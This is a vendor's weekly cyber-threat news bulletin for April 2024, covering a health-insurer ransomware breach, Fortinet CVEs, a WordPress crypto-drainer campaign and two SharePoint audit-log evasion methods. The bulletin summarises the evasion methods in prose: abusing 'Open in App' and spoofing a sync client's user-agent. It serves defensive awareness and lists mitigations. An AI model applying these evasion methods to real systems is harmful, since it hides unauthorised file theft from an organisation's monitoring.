Weekly Cyber News Roundup

April 8th to April 12th 2024

Content 

01. News Bites
  • Group Health Cooperative of South Central Wisconsin Suffers Ransomware Attack
  • SharePoint Logging Evasion Techniques Uncovered
  • Fortinet Vulnerabilities: A Trio of Security Concerns
  • WordPress Sites Targeted by "Crypto Drainers"
02. Conclusion

Quick News Bites

Group Health Cooperative of South Central Wisconsin Suffers Ransomware Attack

The Group Health Cooperative of South Central Wisconsin (GHC-SCW) has been subjected to a significant ransomware attack, affecting 533,809 individuals.

Identified on 25 January 2024, this incident did not involve data encryption but led to the unauthorised exfiltration of sensitive data. The GHC-SCW, whilst identifying the attacker, has not disclosed their identity publicly. However, the Blacksuit ransomware group claimed responsibility on their leak site in March.

Additionally, the threat actor claims to have accessed patients' financial information, employee data, business contracts, and email correspondences. Compromised data could include individuals' names, addresses, telephone numbers, email addresses, dates of birth and/or deaths, social security numbers, member numbers, and Medicare/Medicaid numbers.

Despite their claims, there's currently no evidence of the leaked data being exploited.

The incident highlights the need for robust cyber security measures such as Network Detection and Response (NDR) and Security Information and Event Management (SIEM) systems. These could have potentially detected the data exfiltration, emphasising the necessity for enhanced network visibility and real-time monitoring to avert similar incidents.

SharePoint Logging Evasion Techniques Uncovered

Recent research has exposed two novel techniques that facilitate the bypassing or manipulation of SharePoint audit logs, raising significant concerns given SharePoint's widespread adoption by enterprises globally.

These methods allow unauthorised file downloads without detection, posing a high risk to confidential company information. The first technique exploits the "Open in App" feature, which is only logged as an "Access" event, rendering the download activity less conspicuous. The second method involves spoofing the user-agent string to mimic Microsoft SkyDriveSync calls, thus appearing as a routine "FileSyncDownloadedFull" event.

Flaws were first reported by Varonis Threat Labs in November 2023, but due to them being as moderate fixes are planned for future updates.

Large numbers of access events should be investigated. Limiting users to only be able to access the files they need will reduce the possible scope of an attack from any one user. Syncronisation events should be monitored for suspicious activity such as strange working hours or unusual access locations.

Fortinet Vulnerabilities: A Trio of Security Concerns

Fortinet has recently disclosed three vulnerabilities in its products, presenting varying degrees of risk, including cookie leakage, arbitrary command execution, and sensitive information exposure.

The most severe, CVE-2023-41677, involves a scenario where attackers could capture administrator cookies under specific conditions, particularly when administrators are deceived into visiting malicious websites while using SSL-VPN. This high-severity vulnerability, rated 7.5, affects multiple versions of FortiOS and FortiProxy.

Another issue, CVE-2023-48784, allows for arbitrary code execution in FortiOS due to an externally controlled format string in the command line interface. This medium-severity vulnerability requires local super-admin profile and CLI access for exploitation. The third, CVE-2024-23662, enables unauthenticated actors to collect sensitive device information via HTTP requests, and was rated as medium severity.

The above vulnerabilities range in severity and likeliness of exploitation. However these vulnerabilities could allow an attacker to gain access to a network or gather important reconnaissance information. Affected products should be patched as soon as possible..

WordPress Sites Targeted by "Crypto Drainers"

The security firm Sucuri has disclosed a widespread campaign targeting WordPress sites, with over 2,000 known compromises designed to siphon cryptocurrency from unsuspecting victims. The attackers embedded fake NFT and discount pop-ups across these sites, coaxing visitors to connect their crypto wallets with promises of receiving discounts or NFTs.

These "Crypto drainers" then proceed to drain the connected wallets of funds and NFTs. The initial attack strategy has evolved, now employing scripts that exploit browser vulnerabilities to brute force other sites' passwords, signifying a shift towards a more extensive and monetised campaign.

The malicious scripts, loaded from dynamic-linx[.]com, activate if the "haw" cookie is absent, injecting harmful code into webpages.

Users are urged to never connect your wallets to a website which uses advertisements as the main connection method. Nothing is for free when related to cryptocurrency, discounts which are offered on websites which never previously accepted cryptocurrency are most likely a scam. Best to only use trusted platforms. Check with platforms who claim to recently accept crypto payments. Connect a wallet with minimal funds when something seems off or uncertain.

 

Closing Summary

If you are worried about any of the threats outlined in this bulletin or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager, or alternatively Get in touch to find out how you can protect your organisation. 

Disclaimer

The Threat Intel Roundup was prepared by Integrity360 summarising threat news as we observe it, current at the date of publishing. It should not be considered to be legal, consulting or any other professional advice. Any recommendations should be considered in the context of your own organisation. Integrity360 does not take any political stance in the information that we share. Moreover, the opinions expressed may not necessarily be the views of Integrity360.

Need advice?

If you are worried about any of the threats outlined in this roundup or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager or fill in the form for a complimentary no-commitment consultation.

More detailed threat intelligence news?

If you’d like more detailed threat intelligence news, Integrity360 offers this as part of our security monitoring managed services.

We also offer a tailored threat intelligence monitoring service for your organisation that actively monitors for threat actors and campaigns of direct relevance to your organisation, brand damage, copycat & spoofed domains, credential leakage and dark web monitoring.

Security-first-stacked-logo4-No-Padding

Cyber Security Conference

STOCKHOLM | 17 October 2023

Integrity360's flagship conference Security First comes to Stockholm in 2023!

Join leading cybersecurity experts from across the community as we explore the latest threats and industry trends, and learn practical strategies to safeguard your organisation.